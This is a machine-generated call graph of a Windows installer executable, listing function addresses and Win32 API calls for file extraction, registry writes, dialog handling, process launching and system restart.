4012->4013 4014 40269d ReadFile 4013->4014 4015 405f25 ReadFile 4013->4015 4017 402792 4013->4017 4018 4026dd MultiByteToWideChar 4013->4018 4020 402703 SetFilePointer MultiByteToWideChar 4013->4020 4021 4027a3 4013->4021 4023 402790 4013->4023 4024 405f83 SetFilePointer 4013->4024 4014->4013 4014->4023 4015->4013 4033 4062f7 wsprintfW 4017->4033 4018->4013 4020->4013 4022 4027c4 SetFilePointer 4021->4022 4021->4023 4022->4023 4025 405fbb 4024->4025 4026 405f9f 4024->4026 4025->4013 4027 405f25 ReadFile 4026->4027 4028 405fab 4027->4028 4028->4025 4029 405fc4 SetFilePointer 4028->4029 4030 405fec SetFilePointer 4028->4030 4029->4030 4031 405fcf 4029->4031 4030->4025 4032 405f54 WriteFile 4031->4032 4032->4025 4033->4023 4034 402348 4035 402c37 17 API calls 4034->4035 4036 402357 4035->4036 4037 402c37 17 API calls 4036->4037 4038 402360 4037->4038 4039 402c37 17 API calls 4038->4039 4040 40236a GetPrivateProfileStringW 4039->4040 4044 4016cc 4045 402c37 17 API calls 4044->4045 4046 4016d2 GetFullPathNameW 4045->4046 4047 4016ec 4046->4047 4053 40170e 4046->4053 4050 4066f3 2 API calls 4047->4050 4047->4053 4048 401723 GetShortPathNameW 4049 402abf 4048->4049 4051 4016fe 4050->4051 4051->4053 4054 4063b0 lstrcpynW 4051->4054 4053->4048 4053->4049 4054->4053 4055 401b4d 4056 402c37 17 API calls 4055->4056 4057 401b54 4056->4057 4058 402c15 17 API calls 4057->4058 4059 401b5d wsprintfW 4058->4059 4060 402abf 4059->4060 4061 4047cd 4062 404803 4061->4062 4063 4047dd 4061->4063 4064 4043ac 8 API calls 4062->4064 4065 404345 18 API calls 4063->4065 4066 40480f 4064->4066 4067 4047ea SetDlgItemTextW 4065->4067 4067->4062 4068 401f52 4069 402c37 17 API calls 4068->4069 4070 401f59 4069->4070 4071 4066f3 2 API calls 4070->4071 4072 401f5f 4071->4072 4074 401f70 4072->4074 4075 4062f7 wsprintfW 4072->4075 4075->4074 3448 405553 3449 405574 GetDlgItem GetDlgItem GetDlgItem 3448->3449 3450 4056fd 3448->3450 3493 40437a SendMessageW 3449->3493 3451 405706 GetDlgItem CreateThread FindCloseChangeNotification 3450->3451 3452 40572e 3450->3452 3451->3452 3516 4054e7 OleInitialize 3451->3516 3455 405759 3452->3455 3456 405745 ShowWindow ShowWindow 3452->3456 3457 40577e 3452->3457 3454 4055e4 3459 4055eb GetClientRect GetSystemMetrics SendMessageW SendMessageW 3454->3459 3458 4057b9 3455->3458 3461 405793 ShowWindow 3455->3461 3462 40576d 3455->3462 3498 40437a SendMessageW 3456->3498 3502 4043ac 3457->3502 3458->3457 3466 4057c7 SendMessageW 3458->3466 3464 405659 3459->3464 3465 40563d SendMessageW SendMessageW 3459->3465 3468 4057b3 3461->3468 3469 4057a5 3461->3469 3499 40431e 3462->3499 3471 40566c 3464->3471 3472 40565e SendMessageW 3464->3472 3465->3464 3473 4057e0 CreatePopupMenu 3466->3473 3474 40578c 3466->3474 3470 40431e SendMessageW 3468->3470 3475 405414 24 API calls 3469->3475 3470->3458 3494 404345 3471->3494 3472->3471 3476 4063d2 17 API calls 3473->3476 3475->3468 3478 4057f0 AppendMenuW 3476->3478 3480 405820 TrackPopupMenu 3478->3480 3481 40580d GetWindowRect 3478->3481 3479 40567c 3482 405685 ShowWindow 3479->3482 3483 4056b9 GetDlgItem SendMessageW 3479->3483 3480->3474 3484 40583b 3480->3484 3481->3480 3485 4056a8 3482->3485 3486 40569b ShowWindow 3482->3486 3483->3474 3487 4056e0 SendMessageW SendMessageW 3483->3487 3488 405857 SendMessageW 3484->3488 3497 40437a SendMessageW 3485->3497 3486->3485 3487->3474 3488->3488 3489 405874 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 3488->3489 3491 405899 SendMessageW 3489->3491 3491->3491 3492 4058c2 GlobalUnlock SetClipboardData CloseClipboard 3491->3492 3492->3474 3493->3454 3495 4063d2 17 API calls 3494->3495 3496 404350 SetDlgItemTextW 3495->3496 3496->3479 3497->3483 3498->3455 3500 404325 3499->3500 3501 40432b SendMessageW 3499->3501 3500->3501 3501->3457 3503 4043c4 GetWindowLongW 3502->3503 3513 40444d 3502->3513 3504 4043d5 3503->3504 3503->3513 3505 4043e4 GetSysColor 3504->3505 3506 4043e7 3504->3506 3505->3506 3507 4043f7 SetBkMode 3506->3507 3508 4043ed SetTextColor 3506->3508 3509 404415 3507->3509 3510 40440f GetSysColor 3507->3510 3508->3507 3511 404426 3509->3511 3512 40441c SetBkColor 3509->3512 3510->3509 3511->3513 3514 404440 CreateBrushIndirect 3511->3514 3515 404439 DeleteObject 3511->3515 3512->3511 3513->3474 3514->3513 3515->3514 3523 404391 3516->3523 3518 404391 SendMessageW 3519 405543 OleUninitialize 3518->3519 3521 405531 3521->3518 3522 40550a 3522->3521 3526 401389 3522->3526 3524 4043a9 3523->3524 3525 40439a SendMessageW 3523->3525 3524->3522 3525->3524 3528 401390 3526->3528 3527 4013fe 3527->3522 3528->3527 3529 4013cb MulDiv SendMessageW 3528->3529 3529->3528 4076 402253 4077 402c37 17 API calls 4076->4077 4078 402259 4077->4078 4079 402c37 17 API calls 4078->4079 4080 402262 4079->4080 4081 402c37 17 API calls 4080->4081 4082 40226b 4081->4082 4083 4066f3 2 API calls 4082->4083 4084 402274 4083->4084 4085 402285 lstrlenW lstrlenW 4084->4085 4086 402278 4084->4086 4088 405414 24 API calls 4085->4088 4087 405414 24 API calls 4086->4087 4090 402280 4086->4090 4087->4090 4089 4022c3 SHFileOperationW 4088->4089 4089->4086 4089->4090 4091 401956 4092 402c37 17 API calls 4091->4092 4093 40195d lstrlenW 4092->4093 4094 40258c 4093->4094 4095 401d57 GetDlgItem GetClientRect 4096 402c37 17 API calls 4095->4096 4097 401d89 LoadImageW SendMessageW 4096->4097 4098 401da7 DeleteObject 4097->4098 4099 402abf 4097->4099 4098->4099 4100 402dd7 4101 402e02 4100->4101 4102 402de9 SetTimer 4100->4102 4103 402e50 4101->4103 4104 402e56 MulDiv 4101->4104 4102->4101 4105 402e10 wsprintfW SetWindowTextW SetDlgItemTextW 4104->4105 4105->4103 4107 4014d7 4108 402c15 17 API calls 4107->4108 4109 4014dd Sleep 4108->4109 4111 402abf 4109->4111 4112 4022d7 4113 4022de 4112->4113 4116 4022f1 4112->4116 4114 4063d2 17 API calls 4113->4114 4115 4022eb 4114->4115 4117 405a12 MessageBoxIndirectW 4115->4117 4117->4116 4118 404459 lstrcpynW lstrlenW 4126 40175c 4127 402c37 17 API calls 4126->4127 4128 401763 4127->4128 4129 405ed1 2 API calls 4128->4129 4130 40176a 4129->4130 4130->4130 3913 4023de 3914 402c37 17 API calls 3913->3914 3915 4023f0 3914->3915 3916 402c37 17 API calls 3915->3916 3917 4023fa 3916->3917 3930 402cc7 3917->3930 3920 402885 3921 402432 3922 40243e 3921->3922 3924 402c15 17 API calls 3921->3924 3925 40245d RegSetValueExW 3922->3925 3927 4031ba 44 API calls 3922->3927 3923 402c37 17 API calls 3926 402428 lstrlenW 3923->3926 3924->3922 3928 402473 RegCloseKey 3925->3928 3926->3921 3927->3925 3928->3920 3931 402ce2 3930->3931 3934 40624b 3931->3934 3935 40625a 3934->3935 3936 40240a 3935->3936 3937 406265 RegCreateKeyExW 3935->3937 3936->3920 3936->3921 3936->3923 3937->3936 4131 402862 4132 402c37 17 API calls 4131->4132 4133 402869 FindFirstFileW 4132->4133 4134 402891 4133->4134 4137 40287c 4133->4137 4139 4062f7 wsprintfW 4134->4139 4136 40289a 4140 4063b0 lstrcpynW 4136->4140 4139->4136 4140->4137 4141 4044e2 4142 4044fa 4141->4142 4146 404614 4141->4146 4147 404345 18 API calls 4142->4147 4143 40467e 4144 404748 4143->4144 4145 404688 GetDlgItem 4143->4145 4150 4043ac 8 API calls 4144->4150 4151 4046a2 4145->4151 4152 404709 4145->4152 4146->4143 4146->4144 4148 40464f GetDlgItem SendMessageW 4146->4148 4149 404561 4147->4149 4174 404367 KiUserCallbackDispatcher 4148->4174 4154 404345 18 API calls 4149->4154 4155 404743 4150->4155 4151->4152 4156 4046c8 SendMessageW LoadCursorW SetCursor 4151->4156 4152->4144 4157 40471b 4152->4157 4161 40456e CheckDlgButton 4154->4161 4178 404791 4156->4178 4158 404731 4157->4158 4159 404721 SendMessageW 4157->4159 4158->4155 4163 404737 SendMessageW 4158->4163 4159->4158 4160 404679 4175 40476d 4160->4175 4172 404367 KiUserCallbackDispatcher 4161->4172 4163->4155 4167 40458c GetDlgItem 4173 40437a SendMessageW 4167->4173 4169 4045a2 SendMessageW 4170 4045c8 SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 4169->4170 4171 4045bf GetSysColor 4169->4171 4170->4155 4171->4170 4172->4167 4173->4169 4174->4160 4176 404780 SendMessageW 4175->4176 4177 40477b 4175->4177 4176->4143 4177->4176 4181 4059d8 ShellExecuteExW 4178->4181 4180 4046f7 LoadCursorW SetCursor 4180->4152 4181->4180 4182 401563 4183 402a65 4182->4183 4186 4062f7 wsprintfW 4183->4186 4185 402a6a 4186->4185 4187 401968 4188 402c15 17 API calls 4187->4188 4189 40196f 4188->4189 4190 402c15 17 API calls 4189->4190 4191 40197c 4190->4191 4192 402c37 17 API calls 4191->4192 4193 401993 lstrlenW 4192->4193 4195 4019a4 4193->4195 4194 4019e5 4195->4194 4199 4063b0 lstrcpynW 4195->4199 4197 4019d5 4197->4194 4198 4019da lstrlenW 4197->4198 4198->4194 4199->4197 4200 4027e9 4201 4027f0 4200->4201 4207 402a6a 4200->4207 4202 402c15 17 API calls 4201->4202 4203 4027f7 4202->4203 4204 402806 SetFilePointer 4203->4204 4205 402816 4204->4205 4204->4207 4208 4062f7 wsprintfW 4205->4208 4208->4207 4209 404b6a 4210 404b96 4209->4210 4211 404b7a 4209->4211 4213 404bc9 4210->4213 4214 404b9c SHGetPathFromIDListW 4210->4214 4220 4059f6 GetDlgItemTextW 4211->4220 4216 404bb3 SendMessageW 4214->4216 4217 404bac 4214->4217 4215 404b87 SendMessageW 4215->4210 4216->4213 4218 40140b 2 API calls 4217->4218 4218->4216 4220->4215 4221 40166a 4222 402c37 17 API calls 4221->4222 4223 401670 4222->4223 4224 4066f3 2 API calls 4223->4224 4225 401676 4224->4225 3839 403e6c 3840 403e84 3839->3840 3841 403fbf 3839->3841 3840->3841 3842 403e90 3840->3842 3843 403fd0 GetDlgItem GetDlgItem 3841->3843 3844 404010 3841->3844 3845 403e9b SetWindowPos 3842->3845 3846 403eae 3842->3846 3847 404345 18 API calls 3843->3847 3848 40406a 3844->3848 3856 401389 2 API calls 3844->3856 3845->3846 3849 403eb3 ShowWindow 3846->3849 3850 403ecb 3846->3850 3851 403ffa SetClassLongW 3847->3851 3852 404391 SendMessageW 3848->3852 3857 403fba 3848->3857 3849->3850 3853 403ed3 DestroyWindow 3850->3853 3854 403eed 3850->3854 3855 40140b 2 API calls 3851->3855 3879 40407c 3852->3879 3858 4042ce 3853->3858 3859 403ef2 SetWindowLongW 3854->3859 3860 403f03 3854->3860 3855->3844 3861 404042 3856->3861 3858->3857 3867 4042ff ShowWindow 3858->3867 3859->3857 3864 403fac 3860->3864 3865 403f0f GetDlgItem 3860->3865 3861->3848 3866 404046 SendMessageW 3861->3866 3862 40140b 2 API calls 3862->3879 3863 4042d0 DestroyWindow EndDialog 3863->3858 3870 4043ac 8 API calls 3864->3870 3868 403f22 SendMessageW IsWindowEnabled 3865->3868 3869 403f3f 3865->3869 3866->3857 3867->3857 3868->3857 3868->3869 3872 403f4c 3869->3872 3873 403f93 SendMessageW 3869->3873 3874 403f5f 3869->3874 3883 403f44 3869->3883 3870->3857 3871 4063d2 17 API calls 3871->3879 3872->3873 3872->3883 3873->3864 3876 403f67 3874->3876 3877 403f7c 3874->3877 3875 40431e SendMessageW 3878 403f7a 3875->3878 3880 40140b 2 API calls 3876->3880 3881 40140b 2 API calls 3877->3881 3878->3864 3879->3857 3879->3862 3879->3863 3879->3871 3882 404345 18 API calls 3879->3882 3885 404345 18 API calls 3879->3885 3901 404210 DestroyWindow 3879->3901 3880->3883 3884 403f83 3881->3884 3882->3879 3883->3875 3884->3864 3884->3883 3886 4040f7 GetDlgItem 3885->3886 3887 404114 ShowWindow KiUserCallbackDispatcher 3886->3887 3888 40410c 3886->3888 3910 404367 KiUserCallbackDispatcher 3887->3910 3888->3887 3890 40413e EnableWindow 3895 404152 3890->3895 3891 404157 GetSystemMenu EnableMenuItem SendMessageW 3892 404187 SendMessageW 3891->3892 3891->3895 3892->3895 3894 403e4d 18 API calls 3894->3895 3895->3891 3895->3894 3911 40437a SendMessageW 3895->3911 3912 4063b0 lstrcpynW 3895->3912 3897 4041b6 lstrlenW 3898 4063d2 17 API calls 3897->3898 3899 4041cc SetWindowTextW 3898->3899 3900 401389 2 API calls 3899->3900 3900->3879 3901->3858 3902 40422a CreateDialogParamW 3901->3902 3902->3858 3903 40425d 3902->3903 3904 404345 18 API calls 3903->3904 3905 404268 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 3904->3905 3906 401389 2 API calls 3905->3906 3907 4042ae 3906->3907 3907->3857 3908 4042b6 ShowWindow 3907->3908 3909 404391 SendMessageW 3908->3909 3909->3858 3910->3890 3911->3895 3912->3897 4226 401ced 4227 402c15 17 API calls 4226->4227 4228 401cf3 IsWindow 4227->4228 4229 401a20 4228->4229 3955 40176f 3956 402c37 17 API calls 3955->3956 3957 401776 3956->3957 3958 401796 3957->3958 3959 40179e 3957->3959 3994 4063b0 lstrcpynW 3958->3994 3995 4063b0 lstrcpynW 3959->3995 3962 4017a9 3964 405c81 3 API calls 3962->3964 3963 40179c 3966 406644 5 API calls 3963->3966 3965 4017af lstrcatW 3964->3965 3965->3963 3982 4017bb 3966->3982 3967 4066f3 2 API calls 3967->3982 3968 405e7d 2 API calls 3968->3982 3970 4017cd CompareFileTime 3970->3982 3971 40188d 3973 405414 24 API calls 3971->3973 3972 401864 3974 405414 24 API calls 3972->3974 3984 401879 3972->3984 3976 401897 3973->3976 3974->3984 3975 4063b0 lstrcpynW 3975->3982 3977 4031ba 44 API calls 3976->3977 3978 4018aa 3977->3978 3979 4018be SetFileTime 3978->3979 3980 4018d0 FindCloseChangeNotification 3978->3980 3979->3980 3983 4018e1 3980->3983 3980->3984 3981 4063d2 17 API calls 3981->3982 3982->3967 3982->3968 3982->3970 3982->3971 3982->3972 3982->3975 3982->3981 3989 405a12 MessageBoxIndirectW 3982->3989 3993 405ea2 GetFileAttributesW CreateFileW 3982->3993 3985 4018e6 3983->3985 3986 4018f9 3983->3986 3987 4063d2 17 API calls 3985->3987 3988 4063d2 17 API calls 3986->3988 3990 4018ee lstrcatW 3987->3990 3991 401901 3988->3991 3989->3982 3990->3991 3992 405a12 MessageBoxIndirectW 3991->3992 3992->3984 3993->3982 3994->3963 3995->3962 4237 402570 4238 402c37 17 API calls 4237->4238 4239 402577 4238->4239 4242 405ea2 GetFileAttributesW CreateFileW 4239->4242 4241 402583 4242->4241 4250 401b71 4251 401bc2 4250->4251 4252 401b7e 4250->4252 4253 401bc7 4251->4253 4254 401bec GlobalAlloc 4251->4254 4255 4022de 4252->4255 4260 401b95 4252->4260 4263 401c07 4253->4263 4271 4063b0 lstrcpynW 4253->4271 4256 4063d2 17 API calls 4254->4256 4257 4063d2 17 API calls 4255->4257 4256->4263 4259 4022eb 4257->4259 4265 405a12 MessageBoxIndirectW 4259->4265 4269 4063b0 lstrcpynW 4260->4269 4261 401bd9 GlobalFree 4261->4263 4264 401ba4 4270 4063b0 lstrcpynW 4264->4270 4265->4263 4267 401bb3 4272 4063b0 lstrcpynW 4267->4272 4269->4264 4270->4267 4271->4261 4272->4263 4273 401a72 4274 402c15 17 API calls 4273->4274 4275 401a78 4274->4275 4276 402c15 17 API calls 4275->4276 4277 401a20 4276->4277 4278 4024f2 4279 402c77 17 API calls 4278->4279 4280 4024fc 4279->4280 4281 402c15 17 API calls 4280->4281 4282 402505 4281->4282 4283 402521 RegEnumKeyW 4282->4283 4284 40252d RegEnumValueW 4282->4284 4285 402885 4282->4285 4286 402542 RegCloseKey 4283->4286 4284->4286 4286->4285 4288 401573 4289 401583 ShowWindow 4288->4289 4290 40158c 4288->4290 4289->4290 4291 40159a ShowWindow 4290->4291 4292 402abf 4290->4292 4291->4292 4293 4014f5 SetForegroundWindow 4294 402abf 4293->4294 4295 401e77 4296 402c37 17 API calls 4295->4296 4297 401e7d 4296->4297 4298 402c37 17 API calls 4297->4298 4299 401e86 4298->4299 4300 402c37 17 API calls 4299->4300 4301 401e8f 4300->4301 4302 402c37 17 API calls 4301->4302 4303 401e98 4302->4303 4304 401423 24 API calls 4303->4304 4305 401e9f 4304->4305 4312 4059d8 ShellExecuteExW 4305->4312 4307 401ee1 4308 40683b 5 API calls 4307->4308 4310 402885 4307->4310 4309 401efb CloseHandle 4308->4309 4309->4310 4312->4307 4320 40167b 4321 402c37 17 API calls 4320->4321 4322 401682 4321->4322 4323 402c37 17 API calls 4322->4323 4324 40168b 4323->4324 4325 402c37 17 API calls 4324->4325 4326 401694 MoveFileW 4325->4326 4327 4016a0 4326->4327 4328 4016a7 4326->4328 4330 401423 24 API calls 4327->4330 4329 4066f3 2 API calls 4328->4329 4332 40224a 4328->4332 4331 4016b6 4329->4331 4330->4332 4331->4332 4333 406176 36 API calls 4331->4333 4333->4327 4334 403a7c 4335 403a87 4334->4335 4336 403a8b 4335->4336 4337 403a8e GlobalAlloc 4335->4337 4337->4336 3938 40247e 3949 402c77 3938->3949 3941 402c37 17 API calls 3942 402491 3941->3942 3943 40249c RegQueryValueExW 3942->3943 3948 402885 3942->3948 3944 4024c2 RegCloseKey 3943->3944 3945 4024bc 3943->3945 3944->3948 3945->3944 3954 4062f7 wsprintfW 3945->3954 3950 402c37 17 API calls 3949->3950 3951 402c8e 3950->3951 3952 40621d RegOpenKeyExW 3951->3952 3953 402488 3952->3953 3953->3941 3954->3944 4338 4020fe 4339 402c37 17 API calls 4338->4339 4340 402105 4339->4340 4341 402c37 17 API calls 4340->4341 4342 40210f 4341->4342 4343 402c37 17 API calls 4342->4343 4344 402119 4343->4344 4345 402c37 17 API calls 4344->4345 4346 402123 4345->4346 4347 402c37 17 API calls 4346->4347 4348 40212d 4347->4348 4349 40216c CoCreateInstance 4348->4349 4350 402c37 17 API calls 4348->4350 4353 40218b 4349->4353 4350->4349 4351 401423 24 API calls 4352 40224a 4351->4352 4353->4351 4353->4352 4354 4019ff 4355 402c37 17 API calls 4354->4355 4356 401a06 4355->4356 4357 402c37 17 API calls 4356->4357 4358 401a0f 4357->4358 4359 401a16 lstrcmpiW 4358->4359 4360 401a28 lstrcmpW 4358->4360 4361 401a1c 4359->4361 4360->4361 3186 401f00 3201 402c37 3186->3201 3193 401f39 CloseHandle 3196 402885 3193->3196 3197 401f2b 3198 401f30 3197->3198 3199 401f3b 3197->3199 3226 4062f7 wsprintfW 3198->3226 3199->3193 3202 402c43 3201->3202 3227 4063d2 3202->3227 3205 401f06 3207 405414 3205->3207 3208 40542f 3207->3208 3216 401f10 3207->3216 3209 40544b lstrlenW 3208->3209 3210 4063d2 17 API calls 3208->3210 3211 405474 3209->3211 3212 405459 lstrlenW 3209->3212 3210->3209 3214 405487 3211->3214 3215 40547a SetWindowTextW 3211->3215 3213 40546b lstrcatW 3212->3213 3212->3216 3213->3211 3214->3216 3217 40548d SendMessageW SendMessageW SendMessageW 3214->3217 3215->3214 3218 405995 CreateProcessW 3216->3218 3217->3216 3219 401f16 3218->3219 3220 4059c8 CloseHandle 3218->3220 3219->3193 3219->3196 3221 40683b WaitForSingleObject 3219->3221 3220->3219 3222 406855 3221->3222 3223 406867 GetExitCodeProcess 3222->3223 3269 4067c6 3222->3269 3223->3197 3226->3193 3241 4063df 3227->3241 3228 40662a 3229 402c64 3228->3229 3260 4063b0 lstrcpynW 3228->3260 3229->3205 3244 406644 3229->3244 3231 4065f8 lstrlenW 3231->3241 3234 4063d2 10 API calls 3234->3231 3235 40650d GetSystemDirectoryW 3235->3241 3237 406520 GetWindowsDirectoryW 3237->3241 3238 406644 5 API calls 3238->3241 3239 40659b lstrcatW 3239->3241 3240 406554 SHGetSpecialFolderLocation 3240->3241 3243 40656c SHGetPathFromIDListW CoTaskMemFree 3240->3243 3241->3228 3241->3231 3241->3234 3241->3235 3241->3237 3241->3238 3241->3239 3241->3240 3242 4063d2 10 API calls 3241->3242 3253 40627e 3241->3253 3258 4062f7 wsprintfW 3241->3258 3259 4063b0 lstrcpynW 3241->3259 3242->3241 3243->3241 3251 406651 3244->3251 3245 4066cc CharPrevW 3248 4066c7 3245->3248 3246 4066ba CharNextW 3246->3248 3246->3251 3248->3245 3249 4066ed 3248->3249 3249->3205 3250 4066a6 CharNextW 3250->3251 3251->3246 3251->3248 3251->3250 3252 4066b5 CharNextW 3251->3252 3265 405cae 3251->3265 3252->3246 3261 40621d 3253->3261 3256 4062b2 RegQueryValueExW RegCloseKey 3257 4062e2 3256->3257 3257->3241 3258->3241 3259->3241 3260->3229 3262 40622c 3261->3262 3263 406230 3262->3263 3264 406235 RegOpenKeyExW 3262->3264 3263->3256 3263->3257 3264->3263 3266 405cb4 3265->3266 3267 405cca 3266->3267 3268 405cbb CharNextW 3266->3268 3267->3251 3268->3266 3270 4067e3 PeekMessageW 3269->3270 3271 4067f3 WaitForSingleObject 3270->3271 3272 4067d9 DispatchMessageW 3270->3272 3271->3222 3272->3270 4362 401000 4363 401037 BeginPaint GetClientRect 4362->4363 4364 40100c DefWindowProcW 4362->4364 4366 4010f3 4363->4366 4367 401179 4364->4367 4368 401073 CreateBrushIndirect FillRect DeleteObject 4366->4368 4369 4010fc 4366->4369 4368->4366 4370 401102 CreateFontIndirectW 4369->4370 4371 401167 EndPaint 4369->4371 4370->4371 4372 401112 6 API calls 4370->4372 4371->4367 4372->4371 4373 401503 4374 40150b 4373->4374 4376 40151e 4373->4376 4375 402c15 17 API calls 4374->4375 4375->4376 4377 402306 4378 402314 4377->4378 4379 40230e 4377->4379 4381 402c37 17 API calls 4378->4381 4382 402322 4378->4382 4380 402c37 17 API calls 4379->4380 4380->4378 4381->4382 4383 402c37 17 API calls 4382->4383 4386 402330 4382->4386 4383->4386 4384 402c37 17 API calls 4385 402339 WritePrivateProfileStringW 4384->4385 4386->4384 4394 401f86 4395 402c37 17 API calls 4394->4395 4396 401f8d 4395->4396 4397 40678a 5 API calls 4396->4397 4398 401f9c 4397->4398 4399 401fb8 GlobalAlloc 4398->4399 4400 402020 4398->4400 4399->4400 4401 401fcc 4399->4401 4402 40678a 5 API calls 4401->4402 4403 401fd3 4402->4403 4404 40678a 5 API calls 4403->4404 4405 401fdd 4404->4405 4405->4400 4409 4062f7 wsprintfW 4405->4409 4407 402012 4410 4062f7 wsprintfW 4407->4410 4409->4407 4410->4400 4411 405388 4412 405398 4411->4412 4413 4053ac 4411->4413 4414 40539e 4412->4414 4423 4053f5 4412->4423 4415 4053b4 IsWindowVisible 4413->4415 4417 4053cb 4413->4417 4419 404391 SendMessageW 4414->4419 4416 4053c1 4415->4416 4415->4423 4424 404cde SendMessageW 4416->4424 4418 4053fa CallWindowProcW 4417->4418 4429 404d5e 4417->4429 4421 4053a8 4418->4421 4419->4421 4423->4418 4425 404d01 GetMessagePos ScreenToClient SendMessageW 4424->4425 4426 404d3d SendMessageW 4424->4426 4427 404d35 4425->4427 4428 404d3a 4425->4428 4426->4427 4427->4417 4428->4426 4438 4063b0 lstrcpynW 4429->4438 4431 404d71 4439 4062f7 wsprintfW 4431->4439 4433 404d7b 4434 40140b 2 API calls 4433->4434 4435 404d84 4434->4435 4440 4063b0 lstrcpynW 4435->4440 4437 404d8b 4437->4423 4438->4431 4439->4433 4440->4437 4441 402388 4442 402390 4441->4442 4443 4023bb 4441->4443 4445 402c77 17 API calls 4442->4445 4444 402c37 17 API calls 4443->4444 4446 4023c2 4444->4446 4447 402397 4445->4447 4452 402cf5 4446->4452 4449 402c37 17 API calls 4447->4449 4450 4023cf 4447->4450 4451 4023a8 RegDeleteValueW RegCloseKey 4449->4451 4451->4450 4453 402d0b 4452->4453 4455 402d21 4453->4455 4456 402d2a 4453->4456 4455->4450 4457 40621d RegOpenKeyExW 4456->4457 4462 402d58 4457->4462 4458 402d7e RegEnumKeyW 4459 402d95 RegCloseKey 4458->4459 4458->4462 4460 40678a 5 API calls 4459->4460 4463 402da5 4460->4463 4461 402db6 RegCloseKey 4466 402da9 4461->4466 4462->4458 4462->4459 4462->4461 4464 402d2a 6 API calls 4462->4464 4462->4466 4465 402dc4 RegDeleteKeyW 4463->4465 4463->4466 4464->4462 4465->4466 4466->4455 3545 403489 SetErrorMode GetVersion 3546 4034c8 3545->3546 3547 4034ce 3545->3547 3548 40678a 5 API calls 3546->3548 3549 40671a 3 API calls 3547->3549 3548->3547 3550 4034e4 lstrlenA 3549->3550 3550->3547 3551 4034f4 3550->3551 3552 40678a 5 API calls 3551->3552 3553 4034fb 3552->3553 3554 40678a 5 API calls 3553->3554 3555 403502 3554->3555 3556 40678a 5 API calls 3555->3556 3557 40350e #17 OleInitialize SHGetFileInfoW 3556->3557 3636 4063b0 lstrcpynW 3557->3636 3560 40355a GetCommandLineW 3637 4063b0 lstrcpynW 3560->3637 3562 40356c GetModuleHandleW 3563 403584 3562->3563 3564 405cae CharNextW 3563->3564 3565 403593 CharNextW 3564->3565 3566 4036bd GetTempPathW 3565->3566 3575 4035ac 3565->3575 3638 403458 3566->3638 3568 4036d5 3569 4036d9 GetWindowsDirectoryW lstrcatW 3568->3569 3570 40372f DeleteFileW 3568->3570 3571 403458 12 API calls 3569->3571 3648 402f14 GetTickCount GetModuleFileNameW 3570->3648 3574 4036f5 3571->3574 3572 405cae CharNextW 3572->3575 3574->3570 3577 4036f9 GetTempPathW lstrcatW SetEnvironmentVariableW SetEnvironmentVariableW 3574->3577 3575->3572 3580 4036a8 3575->3580 3582 4036a6 3575->3582 3576 403743 3578 4037f6 3576->3578 3583 4037e6 3576->3583 3588 405cae CharNextW 3576->3588 3581 403458 12 API calls 3577->3581 3737 4039cc 3578->3737 3734 4063b0 lstrcpynW 3580->3734 3586 403727 3581->3586 3582->3566 3678 403abe 3583->3678 3586->3570 3586->3578 3600 403762 3588->3600 3589 403930 3592 4039b4 ExitProcess 3589->3592 3593 403938 GetCurrentProcess OpenProcessToken 3589->3593 3590 403810 3746 405a12 3590->3746 3598 403950 LookupPrivilegeValueW AdjustTokenPrivileges 3593->3598 3599 403984 3593->3599 3595 4037c0 3601 405d89 18 API calls 3595->3601 3596 403826 3602 40597d 5 API calls 3596->3602 3598->3599 3603 40678a 5 API calls 3599->3603 3600->3595 3600->3596 3604 4037cc 3601->3604 3605 40382b lstrcatW 3602->3605 3606 40398b 3603->3606 3604->3578 3735 4063b0 lstrcpynW 3604->3735 3607 403847 lstrcatW lstrcmpiW 3605->3607 3608 40383c lstrcatW 3605->3608 3609 4039a0 ExitWindowsEx 3606->3609 3610 4039ad 3606->3610 3607->3578 3612 403863 3607->3612 3608->3607 3609->3592 3609->3610 3752 40140b 3610->3752 3615 403868 3612->3615 3616 40386f 3612->3616 3614 4037db 3736 4063b0 lstrcpynW 3614->3736 3619 4058e3 4 API calls 3615->3619 3617 405960 2 API calls 3616->3617 3621 403874 SetCurrentDirectoryW 3617->3621 3620 40386d 3619->3620 3620->3621 3622 403884 3621->3622 3623 40388f 3621->3623 3750 4063b0 lstrcpynW 3622->3750 3751 4063b0 lstrcpynW 3623->3751 3626 4063d2 17 API calls 3627 4038ce DeleteFileW 3626->3627 3628 4038db CopyFileW 3627->3628 3633 40389d 3627->3633 3628->3633 3629 403924 3630 406176 36 API calls 3629->3630 3630->3578 3631 406176 36 API calls 3631->3633 3632 4063d2 17 API calls 3632->3633 3633->3626 3633->3629 3633->3631 3633->3632 3634 405995 2 API calls 3633->3634 3635 40390f CloseHandle 3633->3635 3634->3633 3635->3633 3636->3560 3637->3562 3639 406644 5 API calls 3638->3639 3640 403464 3639->3640 3641 40346e 3640->3641 3642 405c81 3 API calls 3640->3642 3641->3568 3643 403476 3642->3643 3644 405960 2 API calls 3643->3644 3645 40347c 3644->3645 3755 405ed1 3645->3755 3759 405ea2 GetFileAttributesW CreateFileW 3648->3759 3650 402f57 3677 402f64 3650->3677 3760 4063b0 lstrcpynW 3650->3760 3652 402f7a 3653 405ccd 2 API calls 3652->3653 3654 402f80 3653->3654 3761 4063b0 lstrcpynW 3654->3761 3656 402f8b GetFileSize 3657 40308c 3656->3657 3675 402fa2 3656->3675 3762 402e72 3657->3762 3661 403127 3664 402e72 32 API calls 3661->3664 3662 4030cf GlobalAlloc 3663 4030e6 3662->3663 3667 405ed1 2 API calls 3663->3667 3664->3677 3666 4030b0 3668 40342b ReadFile 3666->3668 3670 4030f7 CreateFileW 3667->3670 3671 4030bb 3668->3671 3669 402e72 32 API calls 3669->3675 3672 403131 3670->3672 3670->3677 3671->3662 3671->3677 3777 403441 SetFilePointer 3672->3777 3674 40313f 3778 4031ba 3674->3778 3675->3657 3675->3661 3675->3669 3675->3677 3793 40342b 3675->3793 3677->3576 3679 40678a 5 API calls 3678->3679 3680 403ad2 3679->3680 3681 403ad8 3680->3681 3682 403aea 3680->3682 3829 4062f7 wsprintfW 3681->3829 3683 40627e 3 API calls 3682->3683 3684 403b1a 3683->3684 3685 403b39 lstrcatW 3684->3685 3687 40627e 3 API calls 3684->3687 3688 403ae8 3685->3688 3687->3685 3821 403d94 3688->3821 3691 405d89 18 API calls 3692 403b6b 3691->3692 3693 403bff 3692->3693 3695 40627e 3 API calls 3692->3695 3694 405d89 18 API calls 3693->3694 3698 403c05 3694->3698 